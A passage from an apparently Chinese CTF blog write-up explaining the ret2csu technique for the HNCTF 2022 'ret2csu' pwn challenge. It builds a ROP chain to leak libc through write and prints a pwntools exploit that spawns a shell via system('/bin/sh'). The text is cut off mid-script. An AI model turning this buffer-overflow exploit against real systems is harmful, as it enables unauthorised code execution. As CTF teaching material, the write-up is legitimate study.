retn<\/code>\u8fd9\u4e09\u6761\u8bed\u53e5\uff0c\u8fd9\u79cd\u65f6\u5019\u5c31\u8981\u6211\u4eec\u901a\u8fc7ret2csu\u6280\u672f\u6765\u63a7\u5236\u5bc4\u5b58\u5668\u5b58\u5165\u6211\u4eec\u60f3\u8981\u7684\u503c\u6765\u83b7\u53d6\u76ee\u6807\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[HNCTF 2022 WEEK2]ret2csu<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/2963\">HNCTF 2022 WEEK2-ret2csu | NSSCTF<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-26.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-26.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"237\" height=\"131\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-26.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-159\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u6ca1\u6709\u4efb\u4f55\u4fdd\u62a4\uff0c\u6240\u4ee5\u53ef\u4ee5\u901a\u8fc7ret2libc\u6765\u83b7\u53d6shell\uff0c\u89c2\u5bdf\u51fd\u6570\u8868\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-27.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"381\" height=\"366\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-27.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-160\"  sizes=\"auto, (max-width: 381px) 100vw, 381px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53d1\u73b0\u6ca1\u6709<code>puts<\/code>\u51fd\u6570\uff0c\u53ea\u6709<code>write<\/code>\u51fd\u6570\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u8003\u8651\u7528<code>write<\/code>\u51fd\u6570\u6765\u6cc4\u9732<code>libc<\/code>\u57fa\u5740\uff0c\u67e5\u627e<code>pop rdi<\/code>\uff0c<code>pop rsi<\/code>\u4ee5\u53ca<code>pop rdx<\/code>\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-28.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-28.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"361\" height=\"97\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-28.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-161\"  sizes=\"auto, (max-width: 361px) 100vw, 361px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p><code>pop rdx<\/code>\u662f\u7f3a\u5931\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u5229\u7528ret2csu\u6280\u672f\u6765\u5411\u8fd9\u4e09\u4e2a\u5bc4\u5b58\u5668\u5185\u7f6e\u5165\u6211\u4eec\u60f3\u8981\u7684\u503c\uff0c\u6211\u4eec\u8981\u5b58\u5165\u7684\u503c\u5982\u4e0b\u8868\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rdi<\/code><\/td><td>1<\/td><\/tr><tr><td><code>rsi<\/code><\/td><td><code>write<\/code>\u51fd\u6570\u7684<code>got<\/code>\u8868\u5730\u5740<\/td><\/tr><tr><td><code>rdx<\/code><\/td><td>\u5199\u6570\u636e\u7684\u957f\u5ea6<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>ret2csu\u7684\u4e00\u4e9b\u7ec6\u8282\u5728\u8fd9\u91cc\u4e0d\u591a\u8d58\u8ff0\uff0c\u6211\u4eec\u76f4\u63a5\u770b<code>__libc_csu_init<\/code>\u51fd\u6570\u7684\u6c47\u7f16\uff0c\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-29.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-29.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"722\" height=\"121\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-29.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-162\"  sizes=\"auto, (max-width: 722px) 100vw, 722px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4ee5\u53ca\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-30.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-30.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"689\" height=\"134\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-30.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-163\"  sizes=\"auto, (max-width: 689px) 100vw, 689px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4ece\u7b2c\u4e00\u5757\u53ef\u4ee5\u770b\u51fa\u5bc4\u5b58\u5668\u4e4b\u95f4\u6709\u5982\u4e0b\u5bf9\u5e94\u5173\u7cfb\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>r14<\/code>\u5bc4\u5b58\u5668\u5bf9\u5e94<code>rdx<\/code><\/li>\n\n\n\n<li><code>r13<\/code>\u5bc4\u5b58\u5668\u5bf9\u5e94<code>rsi<\/code><\/li>\n\n\n\n<li><code>r12<\/code>\u5bc4\u5b58\u5668\u7684\u4f4e32\u4f4d\u5bf9\u5e94<code>rdi<\/code>\u7684\u4f4e32\u4f4d\uff08\u5373<code>edi<\/code>\uff09<\/li>\n<\/ol>\n\n\n\n<p>\u6545\u5bf9\u4e8e\u7b2c\u4e8c\u5757\uff0c\u51e0\u4e2a\u5bc4\u5b58\u5668\u4e2d\u8981\u5b58\u5165\u7684\u503c\u5982\u4e0b\u8868\u6240\u793a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rbx<\/code><\/td><td>0<\/td><\/tr><tr><td><code>rbp<\/code><\/td><td>1<\/td><\/tr><tr><td><code>r12<\/code><\/td><td>1<\/td><\/tr><tr><td><code>r13<\/code><\/td><td><code>write<\/code>\u51fd\u6570\u7684<code>got<\/code>\u8868\u5730\u5740<\/td><\/tr><tr><td><code>r14<\/code><\/td><td>\u5199\u6570\u636e\u7684\u957f\u5ea6<\/td><\/tr><tr><td><code>r15<\/code><\/td><td><code>write<\/code>\u51fd\u6570\u7684<code>got<\/code>\u8868\u5730\u5740<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6784\u9020\u5982\u4e0bpayload\u6765\u83b7\u53d6<code>write<\/code>\u51fd\u6570\u7684got\u8868\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>payload = b'a' * 0x100 + b'=Triode=' + p64(pop_chain)  \npayload += p64(0)          #add rsp, 8\npayload += p64(0)          #pop rbx\npayload += p64(1)          #pop rbp\npayload += p64(1)          #pop r12\npayload += p64(write_got)  #pop r13\npayload += p64(0x100)      #pop r14\npayload += p64(write_got)  #pop r15\npayload += p64(mov_reg) + b'a' * 0x38 + p64(main)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_chain<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#add rsp, 8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#pop rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#pop rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\">#pop r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\">#pop r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">      <\/span><span style=\"color: #616E88\">#pop r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\">#pop r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">mov_reg<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u5176\u4e2d<code>pop_chain=0x4012A6<\/code>\u6307\u4ece\u6808\u9876<code>pop<\/code>\u5143\u7d20\u5230\u5bc4\u5b58\u5668\u7684\u90a3\u4e32\u6c47\u7f16\uff0c<code>mov_reg=0x401290<\/code>\u6307\u79fb\u52a8\u5bc4\u5b58\u5668\u7684\u90a3\u4e32\u6c47\u7f16\u3002<\/p>\n\n\n\n<p>\u90a3\u4e48\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7ret2libc\u6765\u83b7\u5f97shell\u4e86\uff0c\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"node5.anna.nssctf.cn\", 21504)  \n\nelf = ELF(\".\/ret2csu\")  \nlibc = ELF(\".\/libc.so.6\")  \n\nwrite_plt = elf.plt&#91;\"write\"&#93;  \nwrite_got = elf.got&#91;\"write\"&#93;  \nmain = 0x4011DC  \n\n\"\"\"  \nwrite(fd, buf, count)  \nfd: rdi  \nbuf: rsi  \ncount: rdx  \n\"\"\"  \n\npop_chain = 0x4012A6  \nmov_reg = 0x401290  \npop_rdi = 0x4012b3  \nret = 0x40101a  \n\npayload = b'a' * 0x100 + b'=Triode=' + p64(pop_chain)  \npayload += p64(0)  \npayload += p64(0)  \npayload += p64(1)  \npayload += p64(1)  \npayload += p64(write_got)  \npayload += p64(0x100)  \npayload += p64(write_got)  \npayload += p64(mov_reg) + b'a' * 0x38 + p64(main)  \n\np.sendlineafter(b\"Input:\\n\", payload)  \nwrite_real_addr = u64(p.recvuntil(b\"\\x7f\")&#91;-6:&#93;.ljust(8, b\"\\x00\"))  \nprint(\"&#91;+&#93; the real address of write is\", hex(write_real_addr))  \n\nlibc_base = write_real_addr - libc.sym&#91;\"write\"&#93;  \nprint(\"&#91;+&#93; the base address of libc is\", hex(libc_base))  \n\nsystem = libc_base + libc.sym&#91;\"system\"&#93;  \nsh = libc_base + next(libc.search(b\"\/bin\/sh\"))  \nprint(\"&#91;+&#93; the address of system is\", hex(system))  \nprint(\"&#91;+&#93; the address of \/bin\/sh is\", hex(sh))  \n\npayload = b'a' * 0x100 + b'=Triode=' + p64(pop_rdi) + p64(sh) + p64(system) + p64(ret)  \n\np.sendlineafter(b\"Input:\\n\", payload)  \n\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">node5.anna.nssctf.cn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">21504<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/ret2csu<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/libc.so.6<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">write_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">write<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">write_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">write<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">main <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4011DC<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">&quot;&quot;&quot;<\/span><span style=\"color: #A3BE8C\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">write(fd, buf, count)  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">fd: rdi  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">buf: rsi  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">count: rdx  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">&quot;&quot;&quot;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_chain <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4012A6<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">mov_reg <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">401290<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> 